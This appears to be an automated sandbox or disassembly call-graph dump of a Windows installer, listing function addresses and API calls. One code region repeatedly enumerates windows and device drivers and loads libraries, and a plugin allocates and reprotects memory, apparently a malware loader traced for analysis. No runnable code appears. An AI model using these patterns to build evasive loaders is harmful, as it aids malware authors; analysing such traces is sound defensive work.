CharNextW 8026->8036 8029 403de9 8027->8029 8030 403d6a RegisterClassW 8027->8030 8028->8027 8031 40140b 2 API calls 8029->8031 8033 403da0 SystemParametersInfoW CreateWindowExW 8030->8033 8034 403df3 8030->8034 8035 403def 8031->8035 8037 403d20 8032->8037 8038 403cfa lstrcmpiW 8032->8038 8033->8029 8034->7909 8035->8034 8043 403ec2 18 API calls 8035->8043 8041 403ce9 8036->8041 8040 405e0c 3 API calls 8037->8040 8038->8037 8039 403d0a GetFileAttributesW 8038->8039 8042 403d16 8039->8042 8044 403d26 8040->8044 8041->8032 8042->8037 8045 405e58 2 API calls 8042->8045 8046 403e00 8043->8046 8111 40653d lstrcpynW 8044->8111 8045->8037 8048 403e0c ShowWindow 8046->8048 8049 403e8f 8046->8049 8051 40689a 3 API calls 8048->8051 8112 405672 OleInitialize 8049->8112 8056 403e24 8051->8056 8052 403e95 8053 403eb1 8052->8053 8054 403e99 8052->8054 8057 40140b 2 API calls 8053->8057 8054->8034 8061 40140b 2 API calls 8054->8061 8055 403e32 GetClassInfoW 8059 403e46 GetClassInfoW RegisterClassW 8055->8059 8060 403e5c DialogBoxParamW 8055->8060 8056->8055 8058 40689a 3 API calls 8056->8058 8057->8034 8058->8055 8059->8060 8062 40140b 2 API calls 8060->8062 8061->8034 8062->8034 8063->7898 8064->7947 8065->7912 8066->7953 8067->7964 8069 403b2a 8068->8069 8070 403b1c CloseHandle 8068->8070 8130 403b57 8069->8130 8070->8069 8073 405c49 67 API calls 8074 403a5e OleUninitialize 8073->8074 8074->7920 8074->7921 8076 405bb2 8075->8076 8077 403a76 ExitProcess 8076->8077 8078 405bc6 MessageBoxIndirectW 8076->8078 8078->8077 8080 401389 2 API calls 8079->8080 8081 401420 8080->8081 8081->7924 8083 406069 GetTickCount GetTempFileNameW 8082->8083 8084 40352b 8083->8084 8085 40609f 8083->8085 8084->7900 8085->8083 8085->8084 8086->7981 8087->7983 8088->7987 8090 403022 8089->8090 8091 40303a 8089->8091 8092 403032 8090->8092 8093 40302b DestroyWindow 8090->8093 8094 403042 8091->8094 8095 40304a GetTickCount 8091->8095 8092->7989 8093->8092 8096 406946 2 API calls 8094->8096 8097 403058 CreateDialogParamW ShowWindow 8095->8097 8098 40307b 8095->8098 8099 403048 8096->8099 8097->8098 8098->7989 8099->7989 8100->7996 8101->7998 8103 403ed6 8102->8103 8119 406484 wsprintfW 8103->8119 8105 403f47 8120 403f7b 8105->8120 8107 403c77 8107->8020 8108 403f4c 8108->8107 8109 40657a 17 API calls 8108->8109 8109->8108 8110->8016 8111->8022 8123 4044e5 8112->8123 8114 4056bc 8115 4044e5 SendMessageW 8114->8115 8116 4056ce OleUninitialize 8115->8116 8116->8052 8118 405695 8118->8114 8126 401389 8118->8126 8119->8105 8121 40657a 17 API calls 8120->8121 8122 403f89 SetWindowTextW 8121->8122 8122->8108 8124 4044fd 8123->8124 8125 4044ee SendMessageW 8123->8125 8124->8118 8125->8124 8128 401390 8126->8128 8127 4013fe 8127->8118 8128->8127 8129 4013cb MulDiv SendMessageW 8128->8129 8129->8128 8132 403b65 8130->8132 8131 403b2f 8131->8073 8132->8131 8133 403b6a FreeLibrary GlobalFree 8132->8133 8133->8131 8133->8133 8758 401a30 8759 402da6 17 API calls 8758->8759 8760 401a39 ExpandEnvironmentStringsW 8759->8760 8761 401a4d 8760->8761 8763 401a60 8760->8763 8762 401a52 lstrcmpW 8761->8762 8761->8763 8762->8763 8177 402434 8178 402467 8177->8178 8179 40243c 8177->8179 8181 402da6 17 API calls 8178->8181 8180 402de6 17 API calls 8179->8180 8183 402443 8180->8183 8182 40246e 8181->8182 8189 402e64 8182->8189 8185 40244d 8183->8185 8186 40247b 8183->8186 8187 402da6 17 API calls 8185->8187 8188 402454 RegDeleteValueW RegCloseKey 8187->8188 8188->8186 8190 402e71 8189->8190 8191 402e78 8189->8191 8190->8186 8191->8190 8193 402ea9 8191->8193 8194 4063aa RegOpenKeyExW 8193->8194 8195 402ed7 8194->8195 8196 402ee1 8195->8196 8197 402f8c 8195->8197 8198 402ee7 RegEnumValueW 8196->8198 8203 402f0a 8196->8203 8197->8190 8199 402f71 RegCloseKey 8198->8199 8198->8203 8199->8197 8200 402f46 RegEnumKeyW 8201 402f4f RegCloseKey 8200->8201 8200->8203 8202 40690a 5 API calls 8201->8202 8204 402f5f 8202->8204 8203->8199 8203->8200 8203->8201 8205 402ea9 6 API calls 8203->8205 8206 402f81 8204->8206 8207 402f63 RegDeleteKeyW 8204->8207 8205->8203 8206->8197 8207->8197 9378 401735 9379 402da6 17 API calls 9378->9379 9380 40173c SearchPathW 9379->9380 9381 401757 9380->9381 9382 401d38 9383 402d84 17 API calls 9382->9383 9384 401d3f 9383->9384 9385 402d84 17 API calls 9384->9385 9386 401d4b GetDlgItem 9385->9386 9387 402638 9386->9387 9387->9387 8764 40263e 8765 402652 8764->8765 8766 40266d 8764->8766 8767 402d84 17 API calls 8765->8767 8768 402672 8766->8768 8769 40269d 8766->8769 8771 402659 8767->8771 8772 402da6 17 API calls 8768->8772 8770 402da6 17 API calls 8769->8770 8773 4026a4 lstrlenW 8770->8773 8777 4026d1 8771->8777 8780 4026e7 8771->8780 8782 40610e SetFilePointer 8771->8782 8774 402679 8772->8774 8773->8771 8781 40655f WideCharToMultiByte 8774->8781 8776 40268d lstrlenA 8776->8771 8778 4060df WriteFile 8777->8778 8777->8780 8778->8780 8781->8776 8783 40612a 8782->8783 8786 406142 8782->8786 8784 4060b0 ReadFile 8783->8784 8785 406136 8784->8785 8785->8786 8787 406173 SetFilePointer 8785->8787 8788 40614b SetFilePointer 8785->8788 8786->8777 8787->8786 8788->8787 8789 406156 8788->8789 8790 4060df WriteFile 8789->8790 8790->8786 9388 2b619c9 9395 2b5e3dc 9388->9395 9405 2b5e358 9388->9405 9389 2b6bbf6 LoadLibraryA 9392 2b6bc13 10 API calls 9389->9392 9390 2b5e309 9390->9389 9391 2b6bbda 9390->9391 9401 2b5e3e1 9390->9401 9393 2b6c27d 10 API calls 9391->9393 9394 2b6bc03 9392->9394 9396 2b6bbe5 9393->9396 9398 2b6bc13 10 API calls 9396->9398 9397 2b6bb14 12 API calls 9397->9405 9399 2b6bbf1 9398->9399 9399->9389 9400 2b6f5a0 9401->9400 9402 2b6ef1d 10 API calls 9401->9402 9403 2b6edc0 K32EnumDeviceDrivers 9402->9403 9404 2b6ee17 9403->9404 9405->9390 9405->9395 9405->9397 9405->9401 9406 2b6ebee 11 API calls 9405->9406 9407 2b628e7 9405->9407 9406->9405 9407->9390 9408 2b629a1 9407->9408 9410 2b6ebee 11 API calls 9408->9410 9411 2b62a1e 9408->9411 9409 2b62bc3 9410->9411 9411->9409 9412 2b6ebee 11 API calls 9411->9412 9412->9409 7552 4015c1 7553 402da6 17 API calls 7552->7553 7554 4015c8 7553->7554 7555 405eb7 4 API calls 7554->7555 7567 4015d1 7555->7567 7556 401631 7558 401663 7556->7558 7559 401636 7556->7559 7557 405e39 CharNextW 7557->7567 7562 401423 24 API calls 7558->7562 7579 401423 7559->7579 7568 40165b 7562->7568 7566 40164a SetCurrentDirectoryW 7566->7568 7567->7556 7567->7557 7569 401617 GetFileAttributesW 7567->7569 7571 405b08 7567->7571 7574 405a6e CreateDirectoryW 7567->7574 7583 405aeb CreateDirectoryW 7567->7583 7569->7567 7586 40690a GetModuleHandleA 7571->7586 7575 405abb 7574->7575 7576 405abf GetLastError 7574->7576 7575->7567 7576->7575 7577 405ace SetFileSecurityW 7576->7577 7577->7575 7578 405ae4 GetLastError 7577->7578 7578->7575 7580 40559f 24 API calls 7579->7580 7581 401431 7580->7581 7582 40653d lstrcpynW 7581->7582 7582->7566 7584 405afb 7583->7584 7585 405aff GetLastError 7583->7585 7584->7567 7585->7584 7587 406930 GetProcAddress 7586->7587 7588 406926 7586->7588 7590 405b0f 7587->7590 7592 40689a GetSystemDirectoryW 7588->7592 7590->7567 7591 40692c 7591->7587 7591->7590 7593 4068bc wsprintfW LoadLibraryExW 7592->7593 7593->7591 9413 2b61937 9430 2b5e358 9413->9430 9414 2b6bbf6 LoadLibraryA 9417 2b6bc13 10 API calls 9414->9417 9415 2b5e309 9415->9414 9416 2b6bbda 9415->9416 9426 2b5e3e1 9415->9426 9418 2b6c27d 10 API calls 9416->9418 9419 2b6bc03 9417->9419 9421 2b6bbe5 9418->9421 9420 2b5e3dc 9423 2b6bc13 10 API calls 9421->9423 9422 2b6bb14 12 API calls 9422->9430 9424 2b6bbf1 9423->9424 9424->9414 9425 2b6f5a0 9426->9425 9427 2b6ef1d 10 API calls 9426->9427 9428 2b6edc0 K32EnumDeviceDrivers 9427->9428 9429 2b6ee17 9428->9429 9430->9415 9430->9420 9430->9422 9430->9426 9431 2b6ebee 11 API calls 9430->9431 9432 2b628e7 9430->9432 9431->9430 9432->9415 9433 2b629a1 9432->9433 9435 2b6ebee 11 API calls 9433->9435 9436 2b62a1e 9433->9436 9434 2b62bc3 9435->9436 9436->9434 9437 2b6ebee 11 API calls 9436->9437 9437->9434 8791 4028c4 8792 4028ca 8791->8792 8793 4028d2 FindClose 8792->8793 8794 402c2a 8792->8794 8793->8794 8795 70b5103d 8798 70b5101b 8795->8798 8805 70b515b6 8798->8805 8800 70b51020 8801 70b51027 GlobalAlloc 8800->8801 8802 70b51024 8800->8802 8801->8802 8803 70b515dd 3 API calls 8802->8803 8804 70b5103b 8803->8804 8807 70b515bc 8805->8807 8806 70b515c2 8806->8800 8807->8806 8808 70b515ce GlobalFree 8807->8808 8808->8800 8812 4016cc 8813 402da6 17 API calls 8812->8813 8814 4016d2 GetFullPathNameW 8813->8814 8815 4016ec 8814->8815 8821 40170e 8814->8821 8817 406873 2 API calls 8815->8817 8815->8821 8816 401723 GetShortPathNameW 8818 402c2a 8816->8818 8819 4016fe 8817->8819 8819->8821 8822 40653d lstrcpynW 8819->8822 8821->8816 8821->8818 8822->8821 9438 2b5d539 9439 2b5d53e 9438->9439 9440 2b5d58c 9438->9440 9439->9440 9441 2b5d552 9439->9441 9442 2b6bb14 12 API calls 9440->9442 9443 2b6f513 11 API calls 9441->9443 9444 2b5d5a6 9442->9444 9445 2b5d55a 9443->9445 9446 2b6bb14 12 API calls 9444->9446 9451 2b5d56b 9445->9451 9447 2b5d5b6 9446->9447 9464 2b5d5c5 9447->9464 9453 2b5d590 9451->9453 9459 2b66043 9451->9459 9452 2b6f5a0 9452->9447 9454 2b6bb14 12 API calls 9453->9454 9455 2b5d5a6 9454->9455 9456 2b6bb14 12 API calls 9455->9456 9457 2b5d5b6 9456->9457 9458 2b5d5c5 11 API calls 9457->9458 9463 2b6f37f 9458->9463 9459->9452 9460 2b6ef1d 10 API calls 9459->9460 9461 2b6edc0 K32EnumDeviceDrivers 9460->9461 9462 2b6ee17 9461->9462 9463->9447 9465 2b5d607 9464->9465 9466 2b5d628 9465->9466 9467 2b6ebee 11 API calls 9465->9467 9467->9466 9468 4045cf lstrcpynW lstrlenW 9469 2b61b39 9470 2b61b60 9469->9470 9471 2b6b670 12 API calls 9470->9471 9472 2b61bcf 9470->9472 9471->9472 8218 4014d7 8219 402d84 17 API calls 8218->8219 8220 4014dd Sleep 8219->8220 8222 402c2a 8220->8222 8223 4020d8 8224 40219c 8223->8224 8225 4020ea 8223->8225 8227 401423 24 API calls 8224->8227 8226 402da6 17 API calls 8225->8226 8228 4020f1 8226->8228 8234 4022f6 8227->8234 8229 402da6 17 API calls 8228->8229 8230 4020fa 8229->8230 8231 402110 LoadLibraryExW 8230->8231 8232 402102 GetModuleHandleW 8230->8232 8231->8224 8233 402121 8231->8233 8232->8231 8232->8233 8246 406979 8233->8246 8237 402132 8239 402151 8237->8239 8240 40213a 8237->8240 8238 40216b 8241 40559f 24 API calls 8238->8241 8251 70b51817 8239->8251 8242 401423 24 API calls 8240->8242 8243 402142 8241->8243 8242->8243 8243->8234 8244 40218e FreeLibrary 8243->8244 8244->8234 8293 40655f WideCharToMultiByte 8246->8293 8248 406996 8249 40699d GetProcAddress 8248->8249 8250 40212c 8248->8250 8249->8250 8250->8237 8250->8238 8252 70b5184a 8251->8252 8294 70b51bff 8252->8294 8254 70b51851 8255 70b51976 8254->8255 8256 70b51862 8254->8256 8257 70b51869 8254->8257 8255->8243 8344 70b5243e 8256->8344 8328 70b52480 8257->8328 8262 70b518cd 8268 70b518d3 8262->8268 8269 70b5191e 8262->8269 8263 70b518af 8357 70b52655 8263->8357 8264 70b5187f 8267 70b51885 8264->8267 8272 70b51890 8264->8272 8265 70b51898 8276 70b5188e 8265->8276 8354 70b52e23 8265->8354 8267->8276 8338 70b52b98 8267->8338 8376 70b51666 8268->8376 8270 70b52655 10 API calls 8269->8270 8277 70b5190f 8270->8277 8271 70b518b5 8368 70b51654 8271->8368 8348 70b52810 8272->8348 8276->8262 8276->8263 8284 70b51965 8277->8284 8382 70b52618 8277->8382 8282 70b51896 8282->8276 8283 70b52655 10 API calls 8283->8277 8284->8255 8288 70b5196f GlobalFree 8284->8288 8288->8255 8290 70b51951 8290->8284 8386 70b515dd wsprintfW 8290->8386 8291 70b5194a FreeLibrary 8291->8290 8293->8248 8389 70b512bb GlobalAlloc 8294->8389 8296 70b51c26 8390 70b512bb GlobalAlloc 8296->8390 8298 70b51e6b GlobalFree GlobalFree GlobalFree 8299 70b51e88 8298->8299 8317 70b51ed2 8298->8317 8301 70b5227e 8299->8301 8309 70b51e9d 8299->8309 8299->8317 8300 70b51d26 GlobalAlloc 8320 70b51c31 8300->8320 8302 70b522a0 GetModuleHandleW 8301->8302 8301->8317 8303 70b522c6 8302->8303 8304 70b522b1 LoadLibraryW 8302->8304 8397 70b516bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 8303->8397 8304->8303 8304->8317 8305 70b51d71 lstrcpyW 8308 70b51d7b lstrcpyW 8305->8308 8306 70b51d8f GlobalFree 8306->8320 8308->8320 8309->8317 8393 70b512cc 8309->8393 8310 70b52318 8314 70b52325 lstrlenW 8310->8314 8310->8317 8311 70b52126 8396 70b512bb GlobalAlloc 8311->8396 8398 70b516bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 8314->8398 8315 70b52067 GlobalFree 8315->8320 8316 70b521ae 8316->8317 8325 70b52216 lstrcpyW 8316->8325 8317->8254 8318 70b522d8 8318->8310 8326 70b52302 GetProcAddress 8318->8326 8320->8298 8320->8300 8320->8305 8320->8306 8320->8308 8320->8311 8320->8315 8320->8316 8320->8317 8321 70b51dcd 8320->8321 8323 70b512cc 2 API calls 8320->8323 8321->8320 8391 70b5162f GlobalSize GlobalAlloc 8321->8391 8322 70b5233f 8322->8317 8323->8320 8325->8317 8326->8310 8327 70b5212f 8327->8254 8334 70b52498 8328->8334 8330 70b525c1 GlobalFree 8331 70b5186f 8330->8331 8330->8334 8331->8264 8331->8265 8331->8276 8332 70b52540 GlobalAlloc WideCharToMultiByte 8332->8330 8333 70b5256b GlobalAlloc CLSIDFromString 8333->8330 8334->8330 8334->8332 8334->8333 8335 70b512cc GlobalAlloc lstrcpynW 8334->8335 8337 70b5258a 8334->8337 8400 70b5135a 8334->8400 8335->8334 8337->8330 8404 70b527a4 8337->8404 8340 70b52baa 8338->8340 8339 70b52c4f VirtualAllocEx 8343 70b52c6d 8339->8343 8340->8339 8342 70b52d39 8342->8276 8407 70b52b42 8343->8407 8345 70b52453 8344->8345 8346 70b5245e GlobalAlloc 8345->8346 8347 70b51868 8345->8347 8346->8345 8347->8257 8352 70b52840 8348->8352 8349 70b528ee 8351 70b528f4 GlobalSize 8349->8351 8353 70b528fe 8349->8353 8350 70b528db GlobalAlloc 8350->8353 8351->8353 8352->8349 8352->8350 8353->8282 8356 70b52e2e 8354->8356 8355 70b52e6e GlobalFree 8356->8355 8411 70b512bb GlobalAlloc 8357->8411 8359 70b526d8 MultiByteToWideChar 8362 70b5265f 8359->8362 8360 70b5270b lstrcpynW 8360->8362 8361 70b526fa StringFromGUID2 8361->8362 8362->8359 8362->8360 8362->8361 8363 70b5271e wsprintfW 8362->8363 8364 70b52742 GlobalFree 8362->8364 8365 70b52777 GlobalFree 8362->8365 8366 70b51312 2 API calls 8362->8366 8412 70b51381 8362->8412 8363->8362 8364->8362 8365->8271 8366->8362 8416 70b512bb GlobalAlloc 8368->8416 8370 70b51659 8371 70b51666 2 API calls 8370->8371 8372 70b51663 8371->8372 8373 70b51312 8372->8373 8374 70b51355 GlobalFree 8373->8374 8375 70b5131b GlobalAlloc lstrcpynW 8373->8375 8374->8277 8375->8374 8377 70b51672 wsprintfW 8376->8377 8378 70b5169f lstrcpyW 8376->8378 8381 70b516b8 8377->8381 8378->8381 8381->8283 8383 70b52626 8382->8383 8385 70b51931 8382->8385 8384 70b52642 GlobalFree 8383->8384 8383->8385 8384->8383 8385->8290 8385->8291 8387 70b51312 2 API calls 8386->8387 8388 70b515fe 8387->8388 8388->8284 8389->8296 8390->8320 8392 70b5164d 8391->8392 8392->8321 8399 70b512bb GlobalAlloc 8393->8399 8395 70b512db lstrcpynW 8395->8317 8396->8327 8397->8318 8398->8322 8399->8395 8401 70b51361 8400->8401 8402 70b512cc 2 API calls 8401->8402 8403 70b5137f 8402->8403 8403->8334 8405 70b527b2 VirtualAlloc 8404->8405 8406 70b52808 8404->8406 8405->8406 8406->8337 8408 70b52b4d 8407->8408 8409 70b52b52 GetLastError 8408->8409 8410 70b52b5d 8408->8410 8409->8410 8410->8342 8411->8362 8413 70b513ac 8412->8413 8414 70b5138a 8412->8414 8413->8362 8414->8413 8415 70b51390 lstrcpyW 8414->8415 8415->8413 8416->8370 8823 4028de 8824 4028e6 8823->8824 8825 4028ea FindNextFileW 8824->8825 8828 4028fc 8824->8828 8826 402943 8825->8826 8825->8828 8829 40653d lstrcpynW 8826->8829 8829->8828 8830 4056de 8831 405888 8830->8831 8832 4056ff GetDlgItem GetDlgItem GetDlgItem 8830->8832 8834 405891 GetDlgItem CreateThread CloseHandle 8831->8834 8835 4058b9 8831->8835 8875 4044ce SendMessageW 8832->8875 8834->8835 8836 4058e4 8835->8836 8839 4058d0 ShowWindow ShowWindow 8835->8839 8840 405909 8835->8840 8837 405944 8836->8837 8842 4058f8 8836->8842 8843 40591e ShowWindow 8836->8843 8837->8840 8852 405952 SendMessageW 8837->8852 8838 40576f 8845 405776 GetClientRect GetSystemMetrics SendMessageW SendMessageW 8838->8845 8877 4044ce SendMessageW 8839->8877 8844 404500 8 API calls 8840->8844 8846 404472 SendMessageW 8842->8846 8848 405930 8843->8848 8849 40593e 8843->8849 8847 405917 8844->8847 8850 4057e4 8845->8850 8851 4057c8 SendMessageW SendMessageW 8845->8851 8846->8840 8856 40559f 24 API calls 8848->8856 8857 404472 SendMessageW 8849->8857 8853 4057f7 8850->8853 8854 4057e9 SendMessageW 8850->8854 8851->8850 8852->8847 8855 40596b CreatePopupMenu 8852->8855 8859 404499 18 API calls 8853->8859 8854->8853 8858 40657a 17 API calls 8855->8858 8856->8849 8857->8837 8860 40597b AppendMenuW 8858->8860 8861 405807 8859->8861 8862 405998 GetWindowRect 8860->8862 8863 4059ab TrackPopupMenu 8860->8863 8864 405810 ShowWindow 8861->8864 8865 405844 GetDlgItem SendMessageW 8861->8865 8862->8863 8863->8847 8866 4059c6 8863->8866 8867 405833 8864->8867 8868 405826 ShowWindow 8864->8868 8865->8847 8869 40586b SendMessageW SendMessageW 8865->8869 8870 4059e2 SendMessageW 8866->8870 8876 4044ce SendMessageW 8867->8876 8868->8867 8869->8847 8870->8870 8871 4059ff OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 8870->8871 8873 405a24 SendMessageW 8871->8873 8873->8873 8874 405a4d GlobalUnlock SetClipboardData CloseClipboard 8873->8874 8874->8847 8875->8838 8876->8865 8877->8836 8878 404ce0 8879 404cf0 8878->8879 8880 404d0c 8878->8880 8889 405b81 GetDlgItemTextW 8879->8889 8882 404d12 SHGetPathFromIDListW 8880->8882 8883 404d3f 8880->8883 8885 404d29 SendMessageW 8882->8885 8886 404d22 8882->8886 8884 404cfd SendMessageW 8884->8880 8885->8883 8888 40140b 2 API calls 8886->8888 8888->8885 8889->8884 8890 2b68c12 8891 2b68c30 8890->8891 8892 2b68bfa 8890->8892 8893 2b6bb14 12 API calls 8891->8893 8894 2b68c39 8893->8894 8895 2b6bb14 12 API calls 8894->8895 8896 2b68c82 8895->8896 8897 2b68cf3 8896->8897 8898 2b6bb14 12 API calls 8896->8898 8898->8897 8899 402aeb 8900 402d84 17 API calls 8899->8900 8901 402af1 8900->8901 8902 40657a 17 API calls 8901->8902 8903 40292e 8901->8903 8902->8903 8904 2b5e81e 8905 2b5e854 8904->8905 8906 2b5e8d8 8905->8906 8907 2b6bb14 12 API calls 8905->8907 8907->8906 8912 4026ec 8913 402d84 17 API calls 8912->8913 8914 4026fb 8913->8914 8915 402745 ReadFile 8914->8915 8916 4060b0 ReadFile 8914->8916 8917 402785 MultiByteToWideChar 8914->8917 8918 40283a 8914->8918 8919 40610e 5 API calls 8914->8919 8921 4027ab SetFilePointer MultiByteToWideChar 8914->8921 8922 40284b 8914->8922 8924 402838 8914->8924 8915->8914 8915->8924 8916->8914 8917->8914 8925 406484 wsprintfW 8918->8925 8919->8914 8921->8914 8923 40286c SetFilePointer 8922->8923 8922->8924 8923->8924 8925->8924 8926 2b5d605 8927 2b6ebee 11 API calls 8926->8927 8928 2b5d628 8927->8928 9477 4023f4 9478 402da6 17 API calls 9477->9478 9479 402403 9478->9479 9480 402da6 17 API calls 9479->9480 9481 40240c 9480->9481 9482 402da6 17 API calls 9481->9482 9483 402416 GetPrivateProfileStringW 9482->9483 8929 70b51000 8930 70b5101b 5 API calls 8929->8930 8931 70b51019 8930->8931 8932 4014f5 SetForegroundWindow 8933 402c2a 8932->8933 9484 401ff6 9485 402da6 17 API calls 9484->9485 9486 401ffd 9485->9486 9487 406873 2 API calls 9486->9487 9488 402003 9487->9488 9490 402014 9488->9490 9491 406484 wsprintfW 9488->9491 9491->9490 8934 2b62a01 8935 2b62a06 8934->8935 8937 2b62a1e 8934->8937 8936 2b6ebee 11 API calls 8935->8936 8935->8937 8936->8937 8938 2b62bc3 8937->8938 8939 2b6ebee 11 API calls 8937->8939 8939->8938 9492 70b5170d 9493 70b515b6 GlobalFree 9492->9493 9496 70b51725 9493->9496 9494 70b5176b GlobalFree 9495 70b51740 9495->9494 9496->9494 9496->9495 9497 70b51757 VirtualFree 9496->9497 9497->9494 9498 2b6e70f 9499 2b6e733 9498->9499 9500 2b5e2db 9498->9500 9499->9500 9502 2b6e759 9499->9502 9501 2b5e0e2 EnumWindows 9500->9501 9505 2b5e2e0 9501->9505 9503 2b6e7b4 9502->9503 9520 2b6e777 9502->9520 9506 2b6bbf6 LoadLibraryA 9505->9506 9507 2b6bbda 9505->9507 9516 2b66043 9505->9516 9508 2b6bc13 10 API calls 9506->9508 9509 2b6c27d 10 API calls 9507->9509 9510 2b6bc03 9508->9510 9511 2b6bbe5 9509->9511 9513 2b6bc13 10 API calls 9511->9513 9512 2b6e800 9514 2b6bbf1 9513->9514 9514->9506 9515 2b6f5a0 9516->9515 9517 2b6ef1d 10 API calls 9516->9517 9518 2b6edc0 K32EnumDeviceDrivers 9517->9518 9519 2b6ee17 9518->9519 9521 2b6e78d 9520->9521 9522 2b5e2db 9520->9522 9521->9512 9523 2b5e0e2 EnumWindows 9522->9523 9524 2b5e2e0 9523->9524 9525 2b6bbf6 LoadLibraryA 9524->9525 9526 2b6bbda 9524->9526 9534 2b66043 9524->9534 9527 2b6bc13 10 API calls 9525->9527 9528 2b6c27d 10 API calls 9526->9528 9529 2b6bc03 9527->9529 9530 2b6bbe5 9528->9530 9529->9512 9531 2b6bc13 10 API calls 9530->9531 9532 2b6bbf1 9531->9532 9532->9525 9533 2b6f5a0 9533->9512 9534->9533 9535 2b6ef1d 10 API calls 9534->9535 9536 2b6edc0 K32EnumDeviceDrivers 9535->9536 9537 2b6ee17 9536->9537 8940 4022ff 8941 402da6 17 API calls 8940->8941 8942 402305 8941->8942 8943 402da6 17 API calls 8942->8943 8944 40230e 8943->8944 8945 402da6 17 API calls 8944->8945 8946 402317 8945->8946 8947 406873 2 API calls 8946->8947 8948 402320 8947->8948 8949 402331 lstrlenW lstrlenW 8948->8949 8950 402324 8948->8950 8951 40559f 24 API calls 8949->8951 8952 40559f 24 API calls 8950->8952 8954 40232c 8950->8954 8953 40236f SHFileOperationW 8951->8953 8952->8954 8953->8950 8953->8954 9538 4019ff 9539 402da6 17 API calls 9538->9539 9540 401a06 9539->9540 9541 402da6 17 API calls 9540->9541 9542 401a0f 9541->9542 9543 401a16 lstrcmpiW 9542->9543 9544 401a28 lstrcmpW 9542->9544 9545 401a1c 9543->9545 9544->9545 9546 2b60d09 9549 2b60d5f 9546->9549 9547 2b6133c 9548 2b6f513 11 API calls 9548->9549 9549->9547 9549->9548 9550 401d81 9551 401d94 GetDlgItem 9550->9551 9552 401d87 9550->9552 9553 401d8e 9551->9553 9554 402d84 17 API calls 9552->9554 9555 402da6 17 API calls 9553->9555 9557 401dd5 GetClientRect LoadImageW SendMessageW 9553->9557 9554->9553 9555->9557 9558 401e33 9557->9558 9560 401e3f 9557->9560 9559 401e38 DeleteObject 9558->9559 9558->9560 9559->9560 9561 70b51774 9562 70b517a3 9561->9562 9563 70b51bff 22 API calls 9562->9563 9564 70b517aa 9563->9564 9565 70b517b1 9564->9565 9566 70b517bd 9564->9566 9567 70b51312 2 API calls 9565->9567 9568 70b517e4 9566->9568 9569 70b517c7 9566->9569 9577 70b517bb 9567->9577 9570 70b5180e 9568->9570 9571 70b517ea 9568->9571 9572 70b515dd 3 API calls 9569->9572 9574 70b515dd 3 API calls 9570->9574 9573 70b51654 3 API calls 9571->9573 9575 70b517cc 9572->9575 9576 70b517ef 9573->9576 9574->9577 9578 70b51654 3 API calls 9575->9578 9580 70b51312 2 API calls 9576->9580 9579 70b517d2 9578->9579 9581 70b51312 2 API calls 9579->9581 9582 70b517f5 GlobalFree 9580->9582 9583 70b517d8 GlobalFree 9581->9583 9582->9577 9584 70b51809 GlobalFree 9582->9584 9583->9577 9584->9577 9585 402383 9586 40238a 9585->9586 9588 40239d 9585->9588 9587 40657a 17 API calls 9586->9587 9589 402397 9587->9589 9589->9588 9590 405b9d MessageBoxIndirectW 9589->9590 9590->9588 7721 70b52a7f 7722 70b52acf 7721->7722 7723 70b52a8f VirtualProtect 7721->7723 7723->7722 7724 40248a 7725 402da6 17 API calls 7724->7725 7726 40249c 7725->7726 7727 402da6 17 API calls 7726->7727 7728 4024a6 7727->7728 7741 402e36 7728->7741 7731 402c2a 7732 4024de 7734 4024ea 7732->7734 7765 402d84 7732->7765 7733 402da6 17 API calls 7735 4024d4 lstrlenW 7733->7735 7737 402509 RegSetValueExW 7734->7737 7745 4032b4 7734->7745 7735->7732 7739 40251f RegCloseKey 7737->7739 7739->7731 7742 402e51 7741->7742 7768 4063d8 7742->7768 7746 4032cd 7745->7746 7747 4032fb 7746->7747 7775 4034e5 SetFilePointer 7746->7775 7772 4034cf 7747->7772 7751 403468 7753 4034aa 7751->7753 7758 40346c 7751->7758 7752 403318 GetTickCount 7754 403452 7752->7754 7761 403367 7752->7761 7756 4034cf ReadFile 7753->7756 7754->7737 7755 4034cf ReadFile 7755->7761 7756->7754 7757 4034cf ReadFile 7757->7758 7758->7754 7758->7757 7759 4060df WriteFile 7758->7759 7759->7758 7760 4033bd GetTickCount 7760->7761 7761->7754 7761->7755 7761->7760 7762 4033e2 MulDiv wsprintfW 7761->7762 7764 4060df WriteFile 7761->7764 7763 40559f 24 API calls 7762->7763 7763->7761 7764->7761 7766 40657a 17 API calls 7765->7766 7767 402d99 7766->7767 7767->7734 7769 4063e7 7768->7769 7770 4063f2 RegCreateKeyExW 7769->7770 7771 4024b6 7769->7771 7770->7771 7771->7731 7771->7732 7771->7733 7773 4060b0 ReadFile 7772->7773 7774 403306 7773->7774 7774->7751 7774->7752 7774->7754 7775->7747 9591 40498a 9592 4049b6 9591->9592 9593 4049c7 9591->9593 9652 405b81 GetDlgItemTextW 9592->9652 9594 4049d3 GetDlgItem 9593->9594 9597 404a32 9593->9597 9596 4049e7 9594->9596 9601 4049fb SetWindowTextW 9596->9601 9604 405eb7 4 API calls 9596->9604 9598 404b16 9597->9598 9606 40657a 17 API calls 9597->9606 9650 404cc5 9597->9650 9598->9650 9654 405b81 GetDlgItemTextW 9598->9654 9599 4049c1 9600 4067c4 5 API calls 9599->9600 9600->9593 9605 404499 18 API calls 9601->9605 9603 404500 8 API calls 9608 404cd9 9603->9608 9609 4049f1 9604->9609 9610 404a17 9605->9610 9611 404aa6 SHBrowseForFolderW 9606->9611 9607 404b46 9612 405f14 18 API calls 9607->9612 9609->9601 9616 405e0c 3 API calls 9609->9616 9613 404499 18 API calls 9610->9613 9611->9598 9614 404abe CoTaskMemFree 9611->9614 9615 404b4c 9612->9615 9617 404a25 9613->9617 9618 405e0c 3 API calls 9614->9618 9655 40653d lstrcpynW 9615->9655 9616->9601 9653 4044ce SendMessageW 9617->9653 9621 404acb 9618->9621 9623 404b02 SetDlgItemTextW 9621->9623 9627 40657a 17 API calls 9621->9627 9622 404a2b 9625 40690a 5 API calls 9622->9625 9623->9598 9624 404b63 9626 40690a 5 API calls 9624->9626 9625->9597 9634 404b6a 9626->9634 9628 404aea lstrcmpiW 9627->9628 9628->9623 9630 404afb lstrcatW 9628->9630 9629 404bab 9656 40653d lstrcpynW 9629->9656 9630->9623 9632 404bb2 9633 405eb7 4 API calls 9632->9633 9635 404bb8 GetDiskFreeSpaceW 9633->9635 9634->9629 9638 405e58 2 API calls 9634->9638 9639 404c03 9634->9639 9637 404bdc MulDiv 